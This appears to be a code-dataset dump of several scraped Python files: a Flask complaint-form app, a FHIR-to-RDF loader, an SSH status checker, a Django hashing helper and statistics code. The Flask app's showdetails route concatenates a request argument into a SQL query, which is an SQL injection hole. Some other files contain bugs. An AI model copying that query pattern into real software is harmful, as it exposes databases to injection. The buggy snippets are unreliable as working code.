max_stars_repo_path stringlengths 3 269 | max_stars_repo_name stringlengths 4 119 | max_stars_count int64 0 191k | id stringlengths 1 7 | content stringlengths 6 1.05M | score float64 0.23 5.13 | int_score int64 0 5 |
|---|---|---|---|---|---|---|
main.py | DataScienceWithAbinash/Web-Application-For-Complaints | 1 | 12762451 | from flask import Flask,render_template,request
import random
import sqlite3
app = Flask(__name__)
DATABASE='mydb.db'
def connect_db():
return sqlite3.connect(DATABASE)
@app.route('/')
def index():
return render_template('Home.html')
@app.route('/details')
def details():
return render_template('Details.html')
@app.route('/addrec')
def addrec():
random_number=random.randint(600001,899999)
refno= random_number
name= request.args.get ('name')
email= request.args.get ('email')
consignment_no = request.args.get('cn')
date = request.args.get('date')
product_name = request.args.get('pn')
nature_of_complaint = request.args.get('noc')
db=connect_db()
sql = "insert into crform(refno,name, email,invoice_no, invoice_date,product_name,nature_of_complaint) values(?,?,?,?,?,?,?)"
db.execute(sql,[refno,name,email,consignment_no,date,product_name,nature_of_complaint])#
db.commit()
db.close()
return render_template('Details.html', name=name,email=email,cn=consignment_no,date=date,pn=product_name,noc=nature_of_complaint,refno=random_number)#
@app.route('/registrationform')
def registrationform():
return render_template('RegistrationForm.html')
@app.route('/retrieveform')
def retrieveform():
return render_template('RetrieveForm.html')
@app.route('/showdetails')
def showdetails():
print('successfully done')
db=connect_db()
cur = db.cursor()
refno = request.args.get('Enter Reference number')
cur.execute("select name,email,invoice_no,invoice_date,product_name,nature_of_complaint,status from crform where refno="+str(refno))
rows = cur.fetchall()
return render_template('Result.html',rows= rows)
@app.route('/result')
def result():
print('hi there i am printed')
return render_template('Result.html')
if __name__=='__main__':
app.run(debug=True)
| 2.65625 | 3 |
drf_editable/__init__.py | raiderrobert/drf-editable | 0 | 12762452 | """
Version of drf_editable
"""
__version__ = '0.0.1'
| 1.109375 | 1 |
pyqmc/slateruhf.py | shivupa/pyqmc | 0 | 12762453 | import numpy as np
def sherman_morrison_row(e, inv, vec):
ratio = np.einsum("ij,ij->i", vec, inv[:, :, e])
tmp = np.einsum("ek,ekj->ej", vec, inv)
invnew = (
inv
- np.einsum("ki,kj->kij", inv[:, :, e], tmp) / ratio[:, np.newaxis, np.newaxis]
)
invnew[:, :, e] = inv[:, :, e] / ratio[:, np.newaxis]
return ratio, invnew
class PySCFSlaterUHF:
"""A wave function object has a state defined by a reference configuration of electrons.
The functions recompute() and updateinternals() change the state of the object, and
the rest compute and return values from that state. """
def __init__(self, mol, mf):
self.occ = np.asarray(mf.mo_occ > 0.9)
self.parameters = {}
# Determine if we're initializing from an RHF or UHF object...
if len(mf.mo_occ.shape) == 2:
self.parameters["mo_coeff_alpha"] = mf.mo_coeff[0][:, self.occ[0]]
self.parameters["mo_coeff_beta"] = mf.mo_coeff[1][:, self.occ[1]]
else:
self.parameters["mo_coeff_alpha"] = mf.mo_coeff[
:, np.asarray(mf.mo_occ > 0.9)
]
self.parameters["mo_coeff_beta"] = mf.mo_coeff[
:, np.asarray(mf.mo_occ > 1.1)
]
self._coefflookup = ("mo_coeff_alpha", "mo_coeff_beta")
self._mol = mol
self._nelec = tuple(mol.nelec)
def recompute(self, configs):
"""This computes the value from scratch. Returns the logarithm of the wave function as
(phase,logdet). If the wf is real, phase will be +/- 1."""
mycoords = configs.reshape(
(configs.shape[0] * configs.shape[1], configs.shape[2])
)
ao = self._mol.eval_gto("GTOval_sph", mycoords).reshape(
(configs.shape[0], configs.shape[1], -1)
)
self._aovals = ao
self._dets = []
self._inverse = []
for s in [0, 1]:
if s == 0:
mo = ao[:, 0 : self._nelec[0], :].dot(
self.parameters[self._coefflookup[s]]
)
else:
mo = ao[:, self._nelec[0] : self._nelec[0] + self._nelec[1], :].dot(
self.parameters[self._coefflookup[s]]
)
# This could be done faster; we are doubling our effort here.
self._dets.append(np.linalg.slogdet(mo))
self._inverse.append(np.linalg.inv(mo))
return self.value()
def updateinternals(self, e, epos, mask=None):
"""Update any internals given that electron e moved to epos. mask is a Boolean array
which allows us to update only certain walkers"""
s = int(e >= self._nelec[0])
if mask is None:
mask = [True] * epos.shape[0]
eeff = e - s * self._nelec[0]
ao = self._mol.eval_gto("GTOval_sph", epos)
mo = ao.dot(self.parameters[self._coefflookup[s]])
ratio, self._inverse[s][mask, :, :] = sherman_morrison_row(
eeff, self._inverse[s][mask, :, :], mo[mask, :]
)
self._updateval(ratio, s, mask)
### not state-changing functions
def value(self):
"""Return logarithm of the wave function as noted in recompute()"""
return self._dets[0][0] * self._dets[1][0], self._dets[0][1] + self._dets[1][1]
def _updateval(self, ratio, s, mask):
self._dets[s][0][mask] *= np.sign(ratio) # will not work for complex!
self._dets[s][1][mask] += np.log(np.abs(ratio))
def _testrow(self, e, vec):
"""vec is a nconfig,nmo vector which replaces row e"""
s = int(e >= self._nelec[0])
ratio = np.einsum(
"ij,ij->i", vec, self._inverse[s][:, :, e - s * self._nelec[0]]
)
return ratio
def _testcol(self, i, s, vec):
"""vec is a nconfig,nmo vector which replaces column i"""
ratio = np.einsum("ij,ij->i", vec, self._inverse[s][:, i, :])
return ratio
def gradient(self, e, epos):
""" Compute the gradient of the log wave function
Note that this can be called even if the internals have not been updated for electron e,
if epos differs from the current position of electron e."""
s = int(e >= self._nelec[0])
aograd = self._mol.eval_gto("GTOval_ip_sph", epos)
mograd = aograd.dot(self.parameters[self._coefflookup[s]])
ratios = [self._testrow(e, x) for x in mograd]
return np.asarray(ratios) / self.testvalue(e, epos)[np.newaxis, :]
def laplacian(self, e, epos):
""" Compute the laplacian Psi/ Psi. """
s = int(e >= self._nelec[0])
# aograd=self._mol.eval_gto('GTOval_sph_deriv2',epos)
aolap = np.sum(self._mol.eval_gto("GTOval_sph_deriv2", epos)[[4, 7, 9]], axis=0)
molap = aolap.dot(self.parameters[self._coefflookup[s]])
ratios = self._testrow(e, molap)
return ratios / self.testvalue(e, epos)
def testvalue(self, e, epos):
""" return the ratio between the current wave function and the wave function if
electron e's position is replaced by epos"""
s = int(e >= self._nelec[0])
ao = self._mol.eval_gto("GTOval_sph", epos)
mo = ao.dot(self.parameters[self._coefflookup[s]])
return self._testrow(e, mo)
def pgradient(self):
"""Compute the parameter gradient of Psi.
Returns d_p \Psi/\Psi as a dictionary of numpy arrays,
which correspond to the parameter dictionary.
"""
d = {}
for parm in self.parameters:
s = 0
if "beta" in parm:
s = 1
# Get AOs for our spin channel only
ao = self._aovals[
:, s * self._nelec[0] : self._nelec[s] + s * self._nelec[0], :
] # (config, electron, ao)
pgrad_shape = (ao.shape[0],) + self.parameters[parm].shape
pgrad = np.zeros(pgrad_shape)
# Compute derivatives w.r.t MO coefficients
for i in range(self._nelec[s]): # MO loop
for j in range(ao.shape[2]): # AO loop
vec = ao[:, :, j]
pgrad[:, j, i] = self._testcol(i, s, vec) # nconfig
d[parm] = np.array(pgrad) # Returns config, coeff
return d
def test():
from pyscf import lib, gto, scf
import pyqmc.testwf as testwf
mol = gto.M(atom="Li 0. 0. 0.; H 0. 0. 1.5", basis="cc-pvtz", unit="bohr", spin=0)
for mf in [scf.RHF(mol).run(), scf.ROHF(mol).run(), scf.UHF(mol).run()]:
print("")
nconf = 10
nelec = np.sum(mol.nelec)
slater = PySCFSlaterUHF(mol, mf)
configs = np.random.randn(nconf, nelec, 3)
print("testing internals:", testwf.test_updateinternals(slater, configs))
for delta in [1e-3, 1e-4, 1e-5, 1e-6, 1e-7]:
print(
"delta",
delta,
"Testing gradient",
testwf.test_wf_gradient(slater, configs, delta=delta),
)
print(
"delta",
delta,
"Testing laplacian",
testwf.test_wf_laplacian(slater, configs, delta=delta),
)
print(
"delta",
delta,
"Testing pgradient",
testwf.test_wf_pgradient(slater, configs, delta=delta),
)
if __name__ == "__main__":
test()
| 2.53125 | 3 |
custom/icds_reports/utils/aggregation_helpers/distributed/daily_feeding_forms_child_health.py | satyaakam/commcare-hq | 1 | 12762454 | from dateutil.relativedelta import relativedelta
from custom.icds_reports.const import AGG_DAILY_FEEDING_TABLE
from custom.icds_reports.utils.aggregation_helpers import (
month_formatter,
transform_day_to_month,
)
from custom.icds_reports.utils.aggregation_helpers.distributed.base import (
StateBasedAggregationDistributedHelper,
)
class DailyFeedingFormsChildHealthAggregationDistributedHelper(StateBasedAggregationDistributedHelper):
helper_key = 'daily-feeding-forms-child-health'
ucr_data_source_id = 'dashboard_child_health_daily_feeding_forms'
aggregate_parent_table = AGG_DAILY_FEEDING_TABLE
def drop_index_queries(self):
return [
'DROP INDEX IF EXISTS "icds_dashboard_daily_feeding_forms_state_id_month_273d19dd_idx"',
]
def create_index_queries(self):
return [
'CREATE INDEX IF NOT EXISTS "icds_dashboard_daily_feeding_forms_state_id_month_273d19dd_idx" ON "{}" (state_id, month)'.format(self.aggregate_parent_table),
]
def aggregation_query(self):
current_month_start = month_formatter(self.month)
next_month_start = month_formatter(self.month + relativedelta(months=1))
query_params = {
"month": month_formatter(self.month),
"current_month_start": current_month_start,
"next_month_start": next_month_start,
"state_id": self.state_id,
}
# This query has a strange query plan so there's a few things to note.
# This is joined on the daily_attendance table.
# The daily_attendance aggregation only includes the most recently submitted form for each day.
# Often an AWW may submit multiple daily attendance forms in a day,
# so we choose the last form for each AWW's day.
# Because the result set of docs is actually coming from daily_attendance,
# the JOIN uses the primary key (supervisor_id, doc_id, repeat_iteration).
# Because of this, the UCR does not have an index on (state_id, timeend)
return f"""
INSERT INTO "{self.aggregate_parent_table}" (
state_id, supervisor_id, month, case_id, latest_time_end_processed,
sum_attended_child_ids, lunch_count
) (
SELECT DISTINCT ON (ucr.child_health_case_id)
ucr.state_id AS state_id,
ucr.supervisor_id,
%(month)s AS month,
ucr.child_health_case_id AS case_id,
MAX(ucr.timeend) OVER w AS latest_time_end_processed,
SUM(ucr.attended_child_ids) OVER w AS sum_attended_child_ids,
SUM(ucr.lunch) OVER w AS lunch_count
FROM "{self.ucr_tablename}" ucr
INNER JOIN daily_attendance ON (
ucr.doc_id = daily_attendance.doc_id AND
ucr.supervisor_id = daily_attendance.supervisor_id AND
ucr.state_id = daily_attendance.state_id AND
daily_attendance.month=%(current_month_start)s
)
WHERE ucr.timeend >= %(current_month_start)s AND ucr.timeend < %(next_month_start)s
AND ucr.child_health_case_id IS NOT NULL
AND ucr.state_id = %(state_id)s
WINDOW w AS (PARTITION BY ucr.supervisor_id, ucr.child_health_case_id)
)
""", query_params
def delete_old_data_query(self):
pass
def delete_previous_run_query(self):
pass
| 2.109375 | 2 |
lib/check_ssh.py | nejohnson2/rpi-alarm-clock | 0 | 12762455 | '''
Script to monitor ssh running on
a raspberry pi. If ssh is not
currently active, then reboot.
'''
import subprocess
def main():
cmd = subprocess.Popen("service ssh status", shell=True, stdout=subprocess.PIPE)
for line in cmd.stdout:
if "Active: " in line:
if "active" in line.split(' '):
return
else:
subprocess.call(['sudo','service', 'ssh','restart'])
return
if __name__ == '__main__':
main()
| 3.140625 | 3 |
Python/7/Testing1-2-3/test_testing_1_2_3.py | hwakabh/codewars | 0 | 12762456 | <filename>Python/7/Testing1-2-3/test_testing_1_2_3.py
from unittest import TestCase
from unittest import main
from testing_1_2_3 import number
class TestTesting123(TestCase):
def test_number(self):
test_patterns = [
([], []),
(['a', 'b', 'c'], ['1: a', '2: b', '3: c']),
(['', 'b', '', '', ''], ['1: ', '2: b', '3: ', '4: ', '5: ']),
]
for inp, exp in test_patterns:
with self.subTest(inp=inp, exp=exp):
self.assertEqual(number(lines=inp), exp)
if __name__ == "__main__":
main(verbosity=2)
| 3.484375 | 3 |
constants/scripts.py | lizschley/number_six | 1 | 12762457 | ''' Script constants '''
import os
from portfolio.settings import BASE_DIR
import constants.common as common
# db script arguments
FOR_PROD = 'for_prod'
UPDATING = 'updating'
DB_UPDATE = 'db_update'
TEST_UPDATE = 'test_update'
# s3 updater script argurments
HOME = 'home'
DELETE = 'delete'
static_files = list(common.STATIC_FILE_KEYS)
static_files.append('image')
S3_DATA_KEYS = static_files
# substrings
JSON_SUB = '.json'
PY_SUB = '.py'
SCRIPT_PARAM_SUBSTR = {'filename': '.json', 'process': 'process=', }
# directories
INPUT_CREATE_JSON = os.path.join(BASE_DIR, 'data/data_for_creates')
INPUT_TO_UPDATER_STEP_ONE = os.path.join(BASE_DIR, 'data/data_for_updates/dev_input_step_one')
INPUT_TO_UPDATER_STEP_THREE = os.path.join(BASE_DIR, 'data/data_for_updates/dev_input_step_three')
PROD_INPUT_JSON = os.path.join(BASE_DIR, 'data/data_for_updates/prod_input_json')
# screen scraping input html and any other one_off
GENERAL_INPUT = os.path.join(BASE_DIR, 'data/input')
# filename prefixes
PROD_PROCESS_IND = 'prod_input_'
DEFAULT_PREFIX = 'input_'
# used in utilities.random methods to clear out data, to make things be easier to work with
ALWAYS_ARCHIVE_INPUT_DIRECTORIES = [
'data/data_for_updates/dev_input_step_three/done',
'data/data_for_creates/loaded'
]
NOT_DONE_INPUT_DIRECTORIES = [
'data/data_for_updates/dev_input_step_three',
'data/data_for_creates'
]
PROD_INPUT_DIRECTORY = 'data/data_for_updates/prod_input_json'
| 1.789063 | 2 |
yq_baoliu.py | yq342/Aptamer-predictor | 0 | 12762458 | <filename>yq_baoliu.py
#!/usr/bin/env python
# encoding:utf-8
import pse
import argparse
from argparse import RawTextHelpFormatter
from mlab.releases import latest_release as matlab
from mlab.releases import latest_release as matlab
from mlab.releases import latest_release as matlab
from collections import OrderedDict
import numpy as np
import math
matlab.path(matlab.path(),r'E:\Bioinformation\yq_aptamer\yq_aptamer_web\Pse-in-One-2.0')#设置路径,注意E:\python&matlab为放置MATLAB程序的路径
print "请输入适配体序列"
path_aptamer = matlab.input_file_01()#调用自己定义的m函数就可以了,注意,这里的k3mer为自己定义的MATLAB函数,然后将结果赋给k3mer就好了。
print "请输入靶点序列"
path_target = matlab.input_file_02()#调用自己定义的m函数就可以了,注意,这里的k3mer为自己定义的MATLAB函数,然后将结果赋给k3mer就好了。
# print path
def read_biodata(data_file):
'''
data_file是保存有生物序列的fasta格式的txt文件,并将它保存在字典中,原来的顺序保存在列表中
:param data_file: data_file是保存有生物序列的fasta格式的txt文件
:return:返回
'''
file = open(data_file)
seq = {}
list = [] #由于字典不记录顺序,因此创建一个列表,用来保存键
#将>进行命名,保存成为字典的形式
for line in file:
if line.startswith('>'):
name = line.replace('>','').split()[0]
seq[name] = '' #指的是序列
list.append(name) #将每一个键值保存到列表中
else:
seq[name] += line.replace('\n','') #目的是把换行符给去掉
file.close()
seq = OrderedDict(seq.iteritems())
return seq,list
seq, list = read_biodata(path_aptamer)
# PseDNC
parse = argparse.ArgumentParser(description="This is pse module for generate pse vector.",
formatter_class=RawTextHelpFormatter)
args = parse.parse_args()
args.alphabet = 'DNA'
args.method = 'PseKNC'
args.k = 2
args.inputfiles = [path_aptamer]
args.out = ['PseDNC_TEST.txt']
args.lamada = 3
args.w = 0.05
args.i = 'propChosen_DNC.txt'
args.labels = ['+1', '-1']
args.f = 'csv'
args.e = None
args.a = 'False'
print args
pse.main(args)
# PC-PseTNC-General
args = parse.parse_args()
args.alphabet = 'DNA'
args.method = 'PC-PseTNC-General'
args.k = 3
args.inputfiles = [path_aptamer]
args.out = ['PC_PseTNC_TEST.txt']
args.lamada = 2
args.w = 0.05
args.i = 'propChosen_TNC.txt'
args.labels = ['+1', '-1']
args.f = 'csv'
args.e = None
args.a = 'False'
print args
pse.main(args)
# SC-PseTNC-General
args = parse.parse_args()
args.alphabet = 'DNA'
args.method = 'SC-PseTNC-General'
args.k = 3
args.inputfiles = [path_aptamer]
args.out = ['SC_PseTNC_TEST.txt']
args.lamada = 2
args.w = 0.05
args.i = 'propChosen_TNC.txt'
args.labels = ['+1', '-1']
args.f = 'csv'
args.e = None
args.a = 'False'
print args
pse.main(args)
predict_label = matlab.web()#调用自己定义的m函数就可以了,注意,这里的k3mer为自己定义的MATLAB函数,然后将结果赋给k3mer就好了。
# test_Y = np.row_stack([np.ones([145,1]),-1*np.ones([435,1])])
# print predict_label
# TP1 = 0
# FP1 = 0
# TN1 = 0
# FN1 = 0
# for i in range(len(test_Y)):
# if (test_Y[i] == 1 and (predict_label[i]) == 1):
# TP1 = TP1 + 1
# elif (test_Y[i] == 1 and (predict_label[i]) == -1):
# FN1 = FN1 + 1
# elif (test_Y[i] == -1 and (predict_label[i]) == -1):
# TN1 = TN1 + 1
# elif (test_Y[i] == -1 and (predict_label[i]) == 1):
# FP1 = FP1 + 1
#
# SN = TP1 / (float(TP1 + FN1)) * 100 # Sensitivity = TP/P and P = TP + FN
# SP = TN1 / float(FP1 + TN1) * 100 # Specificity = TN/N and N = TN + FP
# ACC = (TP1 + TN1) / (float(TP1 + FP1 + TN1 + FN1)) * 100
# MCC = (TP1 * TN1 - FP1 * FN1) / (math.sqrt(TP1 + FP1) * math.sqrt(TP1 + FN1) * math.sqrt(TN1 + FP1) * math.sqrt(TN1 + FN1))
#
# # print 'SN= ',SN
# # print 'SP= ',SP
# # print 'ACC= ',ACC
# # print 'MCC= ',MCC
# # print
# for i in range(len(predict_label)):
# if predict_label[i] == 1:
# print '\33[91m '+ '>'+list[i]+ '\33[0m'
# print '\33[91m '+ seq[list[i]]+'-----positve'+ '\33[0m'
# else:
# print '>' + list[i]
# print seq[list[i]]+'-----negative'
for i in range(len(predict_label)):
if predict_label[i] == 1:
print '\33[91m '+ '>'+list[i]+ '\33[0m'
print '\33[91m '+ seq[list[i]]+'-----positve'+ '\33[0m'
else:
print '>' + list[i]
print seq[list[i]]+'-----negative'
| 2.390625 | 2 |
venv/lib/python3.8/site-packages/django/utils/hashable.py | Joshua-Barawa/My-Photos | 16 | 12762459 | <gh_stars>10-100
from django.utils.itercompat import is_iterable
def make_hashable(value):
"""
Attempt to make value hashable or raise a TypeError if it fails.
The returned value should generate the same hash for equal values.
"""
if isinstance(value, dict):
return tuple(
[
(key, make_hashable(nested_value))
for key, nested_value in sorted(value.items())
]
)
# Try hash to avoid converting a hashable iterable (e.g. string, frozenset)
# to a tuple.
try:
hash(value)
except TypeError:
if is_iterable(value):
return tuple(map(make_hashable, value))
# Non-hashable, non-iterable.
raise
return value
| 3.078125 | 3 |
fhirtordf/loaders/fhirjsonloader.py | dnstone/fhirtordf | 0 | 12762460 | <gh_stars>0
# Copyright (c) 2017, <NAME>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# Neither the name of the Mayo Clinic nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
# OF THE POSSIBILITY OF SUCH DAMAGE.
from typing import Optional, Union
from jsonasobj import load, JsonObj
from rdflib import Graph, URIRef
from fhirtordf.fhir.fhirmetavoc import FHIRMetaVoc
from fhirtordf.loaders.fhircollectionloader import FHIRCollection
from fhirtordf.loaders.fhirresourceloader import FHIRResource
def fhir_json_to_rdf(json_fname: str,
base_uri: str = "http://hl7.org/fhir/",
target_graph: Optional[Graph] = None,
add_ontology_header: bool = True,
do_continuations: bool = True,
replace_narrative_text: bool = False,
metavoc: Optional[Union[Graph, FHIRMetaVoc]] = None) -> Graph:
"""
Convert a FHIR JSON resource image to RDF
:param json_fname: Name or URI of the file to convert
:param base_uri: Base URI to use for relative references.
:param target_graph: If supplied, add RDF to this graph. If not, start with an empty graph.
:param add_ontology_header: True means add owl:Ontology declaration to output
:param do_continuations: True means follow continuation records on bundles and queries
:param replace_narrative_text: True means replace any narrative text longer than 120 characters with
'<div xmlns="http://www.w3.org/1999/xhtml">(removed)</div>'
:param metavoc: FHIR Metadata Vocabulary (fhir.ttl) graph
:return: resulting graph
"""
def check_for_continuation(data_: JsonObj) -> Optional[str]:
if do_continuations and 'link' in data_ and isinstance(data_.link, list):
for link_e in data_.link:
if 'relation' in link_e and link_e.relation == 'next':
return link_e.url
return None
if target_graph is None:
target_graph = Graph()
if metavoc is None:
metavoc = FHIRMetaVoc().g
elif isinstance(metavoc, FHIRMetaVoc):
metavoc = metavoc.g
page_fname = json_fname
while page_fname:
data = load(page_fname)
if 'resourceType' in data and data.resourceType != 'Bundle':
FHIRResource(metavoc, None, base_uri, data, target=target_graph, add_ontology_header=add_ontology_header,
replace_narrative_text=replace_narrative_text)
page_fname = check_for_continuation(data)
elif 'entry' in data and isinstance(data.entry, list) and 'resource' in data.entry[0]:
FHIRCollection(metavoc, None, base_uri, data, target=target_graph,
add_ontology_header=add_ontology_header if 'resourceType' in data else False,
replace_narrative_text=replace_narrative_text)
page_fname = check_for_continuation(data)
else:
page_fname = None
target_graph = None
return target_graph
| 1.132813 | 1 |
RJMC_class_functions.py | ocmadin/RJMC_2CLJQ | 1 | 12762461 | <filename>RJMC_class_functions.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Dec 6 12:04:57 2018
MCMC/RJMC Toolbox: A class of functions that implement RJMC/MCMC algorithms, tailored towards the use of RJMC
@author: owenmadin
"""
from __future__ import division
import numpy as np
import scipy as sp
import matplotlib.pyplot as plt
import pandas as pd
import yaml
from scipy.stats import distributions
from scipy.stats import linregress
from scipy.optimize import minimize
import random as rm
from pymc3.stats import hpd
#%%
# Simplify notation
dnorm = distributions.norm.logpdf
dgamma = distributions.gamma.logpdf
duni = distributions.uniform.logpdf
rnorm = np.random.normal
runif = np.random.rand
norm=distributions.norm.pdf
unif=distributions.uniform.pdf
'''
properties = 'rhol'
def calc_posterior(model,eps,sig,Q):
logp = 0
# print(eps,sig)
# Using noninformative priors
logp += duni(sig, 0.2, 0.5)
logp += duni(eps, 100,200)
if model == 0:
Q=0
if model == 1:
logp+=duni(Q,0,2)
# OCM: no reason to use anything but uniform priors at this point. Could probably narrow the prior ranges a little bit to improve acceptance,
#But Rich is rightly being conservative here especially since evaluations are cheap.
# print(eps,sig)
#rhol_hat_fake = rhol_hat_models(T_lin,model,eps,sig)
rhol_hat = rhol_hat_models(T_rhol_data,model,eps,sig,Q) #[kg/m3]
Psat_hat = Psat_hat_models(T_Psat_data,model,eps,sig,Q) #[kPa]
# Data likelihood
if properties == 'rhol':
logp += sum(dnorm(rhol_data,rhol_hat,t_rhol**-2.))
#logp += sum(dnorm(rhol_data,rhol_hat,t_rhol**-2.))
elif properties == 'Psat':
logp += sum(dnorm(Psat_data,Psat_hat,t_Psat**-2.))
elif properties == 'Multi':
logp += sum(dnorm(rhol_data,rhol_hat,t_rhol**-2.))
logp += sum(dnorm(Psat_data,Psat_hat,t_Psat**-2.))
return logp
'''
def RJMC_outerloop(calc_posterior,n_iterations,initial_values,initial_sd,n_models,swap_freq,tune_freq,tune_for,jacobian,transition_function,AUA_opt_params,AUA_Q_opt_params):
#INITIAL SETUP FOR MC LOOP
#-----------------------------------------------------------------------------------------#
n_params = len(initial_values) #One column is the model number
accept_vector=np.zeros((n_iterations))
prop_sd=initial_sd
#Initialize matrices to count number of moves of each type
attempt_matrix=np.zeros((n_models,n_models))
acceptance_matrix=np.zeros((n_models,n_models))
# Initialize trace for parameters
trace = np.zeros((n_iterations+1, n_params)) #n_iterations + 1 to account for guess
logp_trace = np.zeros(n_iterations+1)
# Set initial values
trace[0] = initial_values
# Calculate joint posterior for initial values
current_log_prob = calc_posterior(*trace[0])
logp_trace[0] = current_log_prob
current_params=trace[0].copy()
record_acceptance='False'
#----------------------------------------------------------------------------------------#
#OUTER MCMC LOOP
for i in range(n_iterations):
if not i%5000: print('Iteration '+str(i))
# Grab current parameter values
current_params = trace[i].copy()
current_model = int(current_params[0])
current_log_prob = logp_trace[i].copy()
if i >= tune_for:
record_acceptance='True'
new_params, new_log_prob, attempt_matrix,acceptance_matrix,acceptance = RJMC_Moves(current_params,current_model,current_log_prob,n_models,swap_freq,n_params,prop_sd,attempt_matrix,acceptance_matrix,jacobian,transition_function,record_acceptance,AUA_opt_params,AUA_Q_opt_params)
if acceptance == 'True':
accept_vector[i]=1
logp_trace[i+1] = new_log_prob
trace[i+1] = new_params
if (not (i+1) % tune_freq) and (i < tune_for):
print('Tuning on step %1.1i' %i)
#print(np.sum(accept_vector[i-tune_freq:]))
acceptance_rate = np.sum(accept_vector)/i
print(acceptance_rate)
for m in range (n_params-1):
if acceptance_rate<0.2:
prop_sd[m+1] *= 0.9
print('Yes')
elif acceptance_rate>0.5:
prop_sd[m+1] *= 1.1
print('No')
return trace,logp_trace, attempt_matrix,acceptance_matrix,prop_sd,accept_vector
def RJMC_Moves(current_params,current_model,current_log_prob,n_models,swap_freq,n_params,prop_sd,attempt_matrix,acceptance_matrix,jacobian,transition_function,record_acceptance,AUA_opt_params,AUA_Q_opt_params):
params = current_params.copy()# This approach updates previous param values
#Grab a copy of the current params to work with
#current_log_prob_copy=copy.deepcopy(current_log_prob)
#Roll a dice to decide what kind of move will be suggested
mov_ran=np.random.random()
if mov_ran <= swap_freq:
#mu=0.015
params,rjmc_jacobian,proposed_log_prob,proposed_model,w,lamda,transition_function=model_proposal(current_model,n_models,n_params,params,jacobian,transition_function,AUA_opt_params,AUA_Q_opt_params)
alpha = (proposed_log_prob - current_log_prob) + np.log(rjmc_jacobian) + np.log(transition_function)
acceptance=accept_reject(alpha)
if acceptance =='True':
new_log_prob=proposed_log_prob
new_params=params
if record_acceptance == 'True':
acceptance_matrix[current_model,proposed_model]+=1
attempt_matrix[current_model,proposed_model]+=1
elif acceptance == 'False':
new_params=current_params
new_log_prob=current_log_prob
if record_acceptance == 'True':
attempt_matrix[current_model,proposed_model]+=1
'''
move_type = 'Swap'
else:
move_type = 'Trad'
if move_type == 'Swap':
'''
else:
params,proposed_log_prob=parameter_proposal(params,n_params,prop_sd)
alpha = (proposed_log_prob - current_log_prob)
acceptance=accept_reject(alpha)
if acceptance =='True':
new_log_prob=proposed_log_prob
new_params=params
if record_acceptance == 'True':
acceptance_matrix[current_model,current_model]+=1
attempt_matrix[current_model,current_model]+=1
elif acceptance == 'False':
new_params=current_params
new_log_prob=current_log_prob
if record_acceptance == 'True':
attempt_matrix[current_model,current_model]+=1
return new_params,new_log_prob,attempt_matrix,acceptance_matrix,acceptance
def accept_reject(alpha):
urv=runif()
if np.log(urv) < alpha:
acceptance='True'
else:
acceptance='False'
return acceptance
def model_proposal(current_model,n_models,n_params,params,jacobian,transition_function,AUA_opt_params,AUA_Q_opt_params):
proposed_model=current_model
while proposed_model==current_model:
proposed_model=int(np.floor(np.random.random()*n_models))
lamda=2
params[0] = proposed_model
if proposed_model==1:
params[1] = (AUA_Q_opt_params[0]/AUA_opt_params[0])*params[1]
params[2] = (AUA_Q_opt_params[1]/AUA_opt_params[1])*params[2]
w=runif()
#THIS IS IMPORTANT needs to be different depending on which direction
params[3] = -(1/lamda)*np.log(w)
if proposed_model==0:
params[1] = (AUA_opt_params[0]/AUA_Q_opt_params[0])*params[1]
params[2] = (AUA_opt_params[1]/AUA_Q_opt_params[1])*params[2]
w=np.exp(-lamda*params[3])
params[3]=0
proposed_log_prob=calc_posterior(*params)
jacobian = jacobian(n_models,n_params,w,lamda,AUA_opt_params,AUA_Q_opt_params)
rjmc_jacobian=jacobian[current_model,proposed_model]
transition_function=transition_function(n_models,w)
transition_function=transition_function[current_model,proposed_model]
return params,rjmc_jacobian,proposed_log_prob,proposed_model,w,lamda,transition_function
def parameter_proposal(params,n_params,prop_sd):
proposed_param=int(np.ceil(np.random.random()*(n_params-1)))
params[proposed_param] = rnorm(params[proposed_param], prop_sd[proposed_param])
proposed_log_prob=calc_posterior(*params)
if params[0]==0:
params[3]=0
return params, proposed_log_prob
def mcmc_prior_proposal(n_models,calc_posterior,guess_params,guess_sd):
swap_freq=0.0
n_iter=50000
tune_freq=100
tune_for=10000
for i in range(n_models):
initial_values=guess_params[i,:]
initial_sd=guess_sd[i,:]
trace,logp_trace,attempt_matrix,acceptance_matrix,prop_sd,accept_vector = RJMC_outerloop(calc_posterior,n_iter,initial_values,initial_sd,n_models,swap_freq,tune_freq,tune_for,1,1,1,1)
trace_tuned = trace[tune_for:]
max_ap=np.empty(np.size(trace_tuned,1))
map_CI=np.zeros((np.size(trace_tuned,1),2))
parameter_prior_proposal=np.empty((n_models,np.size(trace_tuned,1),2))
for j in range(np.size(trace_tuned,2)):
bins,values=np.histogram(trace_tuned[:,j],bins=100)
max_ap[j]=(values[np.argmax(bins)+1]+values[np.argmax(bins)])/2
map_CI[j]=hpd(trace_tuned[:,i],alpha=0.05)
sigma_hat=map_CI[j,1]-map_CI[j,0]/(2*1.96)
parameter_prior_proposal[j,i]=[max_ap,sigma_hat*1.5]
support=np.linspace(np.min(trace_tuned[:,j]),np.max(trace_tuned[:,j]),100)
